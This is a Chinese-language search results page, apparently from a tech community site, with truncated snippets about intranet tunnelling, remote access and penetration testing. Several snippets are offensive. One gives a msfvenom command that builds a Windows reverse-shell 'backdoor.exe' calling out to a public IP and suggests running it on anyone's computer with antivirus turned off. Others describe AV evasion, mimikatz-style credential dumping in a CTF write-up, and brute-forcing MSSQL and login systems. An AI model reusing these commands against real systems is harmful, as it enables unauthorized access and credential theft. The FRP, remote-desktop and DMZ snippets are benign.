首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

内网接收外网shell(内网穿透)

前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。...轻量级就可以了,当然你也可以用自己的物理机(shell的接收是虚拟机中的kali) 轻量级就可以了,当然你也可以用自己的物理机(shell的接收是虚拟机中的kali) 最后就是准备一台kalimsf...(这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp...LHOST=101.43.1.181 LPORT=8000 -f exe -o backdoor.exe -o选择文件名,ip地址选择外网服务器的地址 端口选择8000 下载到桌面 我这里用xshell...然后我们生成就好,放到任意谁的电脑上,但是要关杀软,因为我们没加免杀,Windows自带的检测也要关闭 运行后成功外网上线

1.3K20
您找到你想要的搜索结果了吗?
是的
没有找到

远程桌面链接内网服务器(外网内网)详细介绍

这里需要搞清楚本文说的主机客户机。 公司的电脑就是主机,我的笔记本就是客户机。我现在要在家里访问公司电脑。...我这里主要说的是windows的远程桌面 大致步骤如下: 1.先保证主机客户机都可以上网 2.我这里主机客户机都是windows,客户机除了windows,android其实也可以,但是体验不好...3.先登录路由器,进入虚拟路由界面,把3389端口映射出来,3389端口是远程桌面的端口 4.如果是小米路由器在进入DNS,把本机地址链接到第三方的外网映射的服务器上,比如花生壳之类的。...,在公司里,因为内网地址可能被域名绑定,因此不需要考虑地址是否在公网上。...以下是实践操作中查阅的相关资料文档: 外网远程桌面连接内网服务器(https://blog.csdn.net/u010169742/article/details/77993022) win7 不设置用户名密码远程登录方法

9.8K40

外网打点到内网横向

- 弱鸡 (ruoji.info) 第一个flag–外网打点 第一个flag就是签到题,当时图忘记留了,就是直接就给出flag了 图片 图片 Z-BlogPHP 1.7.2CMS,后台路径是zb_system...c8aZaU CS简单做个免杀套个壳改一下特征码即可实现绕火绒,上传上去之后cs上线 这地方到后面几天,免杀也不行了,虽说上传上去了但是运行不上线,用powershell进行上线 上传fscan进行内网探测...#外网对应内网地址 [+] SSH:192.168.1.129:22:root root #蜜罐 192.168.243.135:3306 open 192.168.243.135:135 open...129几乎全是蜜罐 第三个flag-内网横向 cs上线 图片 抓取密码 -logonpasswords Authentication Id : 0 ; 506030 (00000000:0007b8ae...) kerberos : Username : desktop-48iqavs$ Domain : WORKGROUP Password : (null) ssp : KO credman : 内网横向探测

1K30

FRP内网穿透单机传奇架设外网

看着这个标题我我自己都有点懵,大概意思就是用自己家的电脑架设一个传奇服务端,然后用FRP内网穿透可以在外网玩,标题写的有点纠结,就这样吧。...请先准备工具: 1.电脑(能上网的那种); 2.服务器1台(自己玩1M宽带即可,很多人玩就自己看着办); 3.一个支持frp内网穿透的路由器(好像有软件也可以支持,没试过); 4.好像没了(一个脑子༼...∗ •̀ (oo) •́ ∗ ༽) 开始搞事情 先在服务器上面安装frp内网穿透:Frp内网穿透Frp一键安装脚本及设置教程 然后就在路由器设置和服务器没啥太大的关系了。...下面是在外网访问的效果:(图片大让它加载一会会儿) ?...也可以体验下爱游架设的,就我盆友偶尔玩玩,服务器就2M的带宽 下载信息 资源名称:资源名称:外网测试 应用平台:应用平台:windows 资源版本:资源版本: 资源大小:资源大小:8.20MB

3.9K30

内网外网DMZ的防火墙保护程度排序辨析

标题:内网外网DMZ的防火墙保护程度排序及举例说明 引言 在网络安全中,防火墙是一种重要的安全设备,用于保护网络免受未经授权的访问攻击。...防火墙通常根据网络的布局安全需求,将网络划分为内网外网DMZ(区域)三个区域,并为每个区域提供不同程度的保护。...本文将按照受保护程度从低到高的顺序正确排列内网外网DMZ,并通过举例详细解释每个区域的特点保护层级。...DMZ(Demilitarized Zone) DMZ是介于内网外网之间的中间区域。它用于承载组织提供给外部用户的服务,同时与内部网络(内网外部网络(外网)相隔离。...内网的防火墙将限制外部流量进入内网,只允许经过身份验证的内部用户访问内部资源,从而确保内网的安全性。 结论 根据受保护程度,正确的排列次序是外网、DMZ内网

1.1K31

内网外网MSSQL口令扫描渗透

在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透...本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。...1.使用SQLPing扫描获取mssql口令 在SQLPing程序目录,配置好passlist.txtuserlist.txt文件,如图1所示,设置扫描的IP地址及其范围,本案例是针对内网开始地址192.100.100.1...Passwordlist根据实际收集的密码来进行扫描,如果是普通密码破解,则可以使用top10000password这种字典,在内网中可以逐渐加强该字典,将收集到的所有用户密码全部加入。...XML********登录192.100.100.33服务器,如图16所示成功获取内网中一台服务器权限。

2.3K60

nps内网穿透实现外网访问树莓派

今天先说一下最重要的问题:如何通过内外穿透让外网访问到树莓派上的服务? 从网站建好以后,试过两种内网穿透方式,花生壳、NPS。...但nps有个最大的问题就是:需要一台外网能访问到的服务器来架设nps服务。有人说你都有外网的服务器了还要内网穿透干什么呢?...在我看来,坚持使用nps的理由是这样,nps轻量级,高性能,但其本身负责的是流量转发功能,我们可以在内网服务器进行更密集、高负荷的运算,而承担nps服务的外网服务器的配置要求就低很多。...配置客户端连接 现在服务端客户端的连接已经建立起来,那么该如何访问内网的WordPress呢? 搞个域名先,国内的需要备案。...在服务端web页选择 域名解析 -> 新增 填入备注、域名、内网WordPress IP端口号,客户端id要填之前新建好的客户端id。搞定。

1.4K20

外网内网的渗透姿势分享

渗透的大体过程 整个渗透测试的流程就是通过信息收,集到外网的 web 漏洞挖掘,来获取一个 webshell ,通过这个 shell 进一步利用来打进内网,进行内网渗透、域渗透,最终获取域控权限的一个过程...撞库漏洞 主要是针对于一些员工系统登录系统、信息查询系统、OA 系统进行撞库,在没有验证码的登录系统中屡试不爽。...勾选上所有的数据库的选项,把用户名密码字典导入,勾选上扫描端口。 运气好的话还是可以出结果的。 ?...内网数据库爆破 这里推荐使用 F-Scrack DBScanner 工具,在 github 上面都有,进入内网之后弱口令比较多,扫描爆破的效果还是不错的。...所以这时候你一般就没有办法直接连接到他的 3389 端口,因为他在内网里所以就只能使用端口转发了。 如果存在外网 IP 的话显示的就是外网 IP。

2K30
领券